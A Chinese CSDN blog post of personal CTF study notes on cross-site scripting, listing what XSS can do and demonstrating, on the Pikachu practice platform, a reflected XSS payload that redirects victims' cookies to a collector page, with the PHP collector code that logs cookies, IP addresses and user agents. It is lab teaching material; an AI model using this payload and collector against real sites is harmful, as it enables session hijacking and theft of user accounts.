跨站脚本攻击漏洞怎么修复_CTF自学笔记(三)跨站脚本攻击[三]

最新推荐文章于 2024-04-02 15:55:50 发布
最新推荐文章于 2024-04-02 15:55:50 发布
阅读量401 收藏
点赞数
文章标签: 跨站脚本攻击漏洞怎么修复
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39874269/article/details/111364282
版权
1d05fe0d5b9c33c571f0cc30d18e85d3.gif

点击上方蓝字关注!

注:本篇文章为个人学习笔记仅供学习交流。

e867a594f816b45af4db5f475f025b3f.gif

NO.3

2020.8.9 

星期日

XSS漏洞危害与利用技巧

在浏览器中XSS漏洞所能做的事情通过XSS漏洞都可以完成。XSS漏洞可实现的功能包括但不限于:

  • 窃取用户cookie信息,伪造用户身份;

  • 与浏览器DOM对象进行交互,执行受害者所有可以执行的操作;

  • 获取网页源码;

  • 发起HTTP请求;

  • 使用HTML5 Geolocation API获取地理位置信息;

  • 使用WebRTC API获取网络信息;

  • 发起HTTP请求对内网主机进行扫描,对存在漏洞的主机进行攻击;

个别示例

漏洞平台->PiKachu漏洞平台搭建 利用xss获取cookie 先打开cookie.php修改重定向URL,如下图:

9e8507977ca8dc88e0724fd67fd625c1.png

9d754d379a37c286fcc992095a122ec9.png

到反射型xss(get)关卡插入如下payload,可以通过修改源代码扩大可输入的字符数,如下:

e65f2443cf061fad5e401b0fc4c548f7.png

<script>document.location='http://127.0.0.1/pikachu-master/pkxss/xcookie/cookie.php?cookie=' +document.cookie;script>
在输入框插入payload后按回车就会重定向到我们刚才修改的页面。

1d11949cd00bb7d7aa36036ed56f39ad.png

此时我们登陆后台就可以看到cookie了。

ebd2257bc9cafe1c534edc7b40abc328.png

5e9f604e1abf40b10cef39c3a4566bb4.png

主要获取cookie的PHP代码 
<?php include_once '../inc/config.inc.php';include_once '../inc/mysql.inc.php';$link=connect();//这个是获取cookie的api页面if(isset($_GET['cookie'])){    $time=date('Y-m-d g:i:s');    $ipaddress=getenv ('REMOTE_ADDR');    $cookie=$_GET['cookie'];    $referer=$_SERVER['HTTP_REFERER'];    $useragent=$_SERVER['HTTP_USER_AGENT'];    $query="insert cookies(time,ipaddress,cookie,referer,useragent)     values('$time','$ipaddress','$cookie','$referer','$useragent')";    $result=mysqli_query($link, $query);}header("Location:http://127.0.0.1/pikachu-master/index.php");//重定向到一个可信的网站?>

cedd5ecd4869b789ce6ec25dcdf19e7d.gif

- End -

92bd4b0952a9a9dc4cde8277e1a2e963.png 往期推荐

  • CTF自学笔记(三)跨站脚本攻击[一]

  • CTF自学笔记(三)跨站脚本攻击[二]

e096c11150c8b6c16ebce158193ed495.png觉得不错,请点个在看

weixin_39874269
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctf脚本_ctfpy脚本_ctf跑脚本_ctf_ctf脚本密码_
09-30
ctf 密码学 脚本 合集 非常 nice
XSS(跨站脚本)介绍及修复
OnlyRu丶小心心
08-04 1271
XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前的江湖地位。 XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。XSS漏洞可以用来进行钓鱼攻击、前端js挖矿、用户cookie获取,甚至可以结合浏览器自身的漏洞对用户主机进行远程控制等。 形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,导致“精心构造”的字符输出在前端时被浏览器当作有效代码解析执行从而产生危害。 因此在XSS漏洞的防范上,一般会采用“对输入进行过滤”和“输出进行转义”的
JQuery跨站脚本漏洞
最新发布
qq274575499的博客
04-02 605
jQuery 3.4.0之前版本中存在跨站脚本漏洞,该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。
跨站脚本攻击漏洞XSS):基础知识和防御策略
weixin_43263566的博客
01-16 8109
跨站脚本攻击漏洞-基础篇
跨站脚本攻击XSS)分类介绍及解决办法
热门推荐
半夏_2021的博客
04-26 2万+
Cross-Site Scripting(跨站脚本攻击)简称 XSS,是一种代码注入攻击。攻击者通过在目标网站上注入恶意脚本,使之在用户的浏览器上运行。利用这些恶意脚本,攻击者可获取用户的敏感信息如 Cookie、SessionID 等,进而危害数据安全。
渗透测试技术----常见web漏洞--跨站脚本攻击原理及防御
wwl012345的博客
08-16 2535
一、跨站脚本攻击介绍 1.跨站脚本攻击简介 跨站脚本攻击(Cross-Site Scripting)简称为XSS(本来为CSS,但是与前端语言CSS容易产生歧义,故取名为XSS),XSS是一种针对于网站应用程序(Web客户端)的安全漏洞攻击技术,是代码注入的一种,它允许攻击者将恶意JS代码注入到网页,这样其他用户在访问网页时就会受到影响。攻击者利用XSS代码攻击成功后,可能得到一些高权限来执行一...
网络安全XSS跨站脚本攻击漏洞和不安全HTTP方法的修补
Funky_oaNiu的博客
12-23 1764
一、项目背景 一个Springboot+MyBatis+Redis+MySQL的辣鸡小项目。奈何再小的项目也需要保证安全,今天提交给测试部门做渗透测试,打回来两个网络安全漏洞,网上有很多“模糊”的修改办法,我们来看看具体怎么修补吧。 二、漏洞描述 1.不安全的HTTP方法 不安全的HTTP方法一般包括:TRACE、PUT、DELETE、COPY 等。其中最常见的为TRACE方法可以回显服务器收到的请求,主要用于测试或诊断,恶意攻击者可以利用该方法进行跨站跟踪攻击(即XST攻击),从而进行网站钓鱼、盗取管理员
复现XSS漏洞及分析
qq_56724164的博客
09-04 430
XSS
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
CTF脚本-caser凯撒解密
05-26
用于凯撒解密,通过python3 caser_凯撒密码.py,在输入框中输入需要解密的caser密文,脚本即可自动进行凯撒解密
记录ctf解题过程及脚本.zip
10-25
记录ctf解题过程及脚本
java越权_从Java的角度简单修复Cookie越权漏洞
weixin_33268205的博客
02-12 1656
技术实在是有限,讲解cookie越权的时候可能有点简单和粗糙。这里就简单记录学习下。首先自己写一段存在漏洞的代码code:sendCookie.javapackagecookie;importjava.io.IOException;importjavax.servlet.ServletException;importjavax.servlet.http.Cookie;importjavax.ser...
XSS跨站点脚本漏洞修复参考
煜铭2011
10-23 4781
0x01 介绍 在以下情况下会发生跨站点脚本编制 (XSS) 脆弱性: [1] 不可信数据进入 Web 应用程序,通常来自 Web 请求。 [2] Web 应用程序动态生成了包含此不可信数据的 Web 页面。 [3] 页面生成期间,应用程序不会禁止数据包含可由 Web 浏览器执行的内容,例如 JavaScript、HTML 标记、HTML 属性、鼠标事件、Flash 和 ActiveX。
超详细的cookie属性HttpOnly和SameSite引起的漏洞解决方案
dhklsl的专栏
08-19 9158
解决漏扫cookie漏洞:Cookie No HttpOnly Flag和Cookie Without SameSite Attribute。设置cookie的httponly和samesite属性。
CTF学习笔记——跨站脚本攻击
xuanyulevel6的博客
08-29 2206
XSS (Cross Site Scripting),即跨站脚本攻击,是一种常见于 Web 应用中的计算机安全漏洞。恶意攻击者往 Web 页面里嵌入恶意的客户端脚本,当用户浏览此网页时,脚本就会在用户的浏览器上执行,进而达到攻击者的目的。比如获取用户的 Cookie、导航到恶意网站、携带木马等。借助安全圈里面非常有名的一句话:*所有的输入都是有害的。*这句话把 XSS 漏洞的本质体现的淋漓尽致。大部分的 XSS 漏洞都是由于没有处理好用户的输入,导致恶意脚本在浏览器中执行。...
CTF特训营》——跨站脚本攻击XSS
PICACHU+++的博客
07-15 2201
跨站脚本攻击简称XSS,是一种网站应用程序漏洞,是代码注入漏洞的一种,攻击者可以通过这个漏洞向网页中注入恶意代码,导致用户浏览器加载网页、渲染HTML文档时执行攻击者代码。反射型XSS,存储型XSS,DOM型XSS输出在HTML属性中,输出在CSS代码中,输出在JavaScript中.......................................
影像笔记 默认存储_CTF自学笔记跨站脚本攻击[一]
weixin_39676242的博客
11-22 91
点击上方蓝字关注!注:本篇文章为个人学习笔记仅供学习交流。概述跨站脚本攻击,通常称为XSS,是一种通过代码注入的网站应用程序安全漏洞。攻击者可以通过向网页中注入恶意代码,导致用户浏览器在加载网页,渲染HTML时就会执行恶意代码。(本篇示例在pikachu漏洞练习平台演示,搭建教程见下篇。)常见XSS漏洞1.反射型XSS攻击者输入xss代码,提交给服务器,服务器解析后,在响应中返回输入的x...
跨站脚本攻击漏洞怎么修复_十大常见web漏洞——跨站脚本漏洞
weixin_39863155的博客
12-14 3990
跨站脚本漏洞(Cross-site scripting,通常简称为XSS)发生在客户端,可被用于进行窃取隐私、钓鱼欺骗、窃取密码、传播恶意代码等攻击。XSS攻击使用到的技术主要为HTML和Javascript,也包括VBScript和ActionScript等。XSS攻击对WEB服务器虽无直接危害,但是它借助网站进行传播,使网站的使用用户受到攻击,导致网站用户帐号被窃取,从而对网站也产生了较严重的...
java 跨站脚本_原创干货 | Java代码审计之跨站脚本攻击
weixin_39688378的博客
02-20 468
▼▼01关于跨站脚本攻击跨站脚本攻击(CrossSite Scripting),为不和层叠样式表(CascadingStyle Sheets,CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页面时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。02审计思路XSS一般分为反射型、存储型、DOM型。DOM型比较...
welcome_CAT_CTF
07-28
根据引用\[1\]中的描述,"welcome_CAT_CTF"是一个题目中的关键点,通过控制@的移动和输入j来增加猫币,当猫币大于100000000时可以获得flag。而根据引用\[2\]中的描述,flag可能隐藏在osu游戏的谱面中,需要打开osz...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值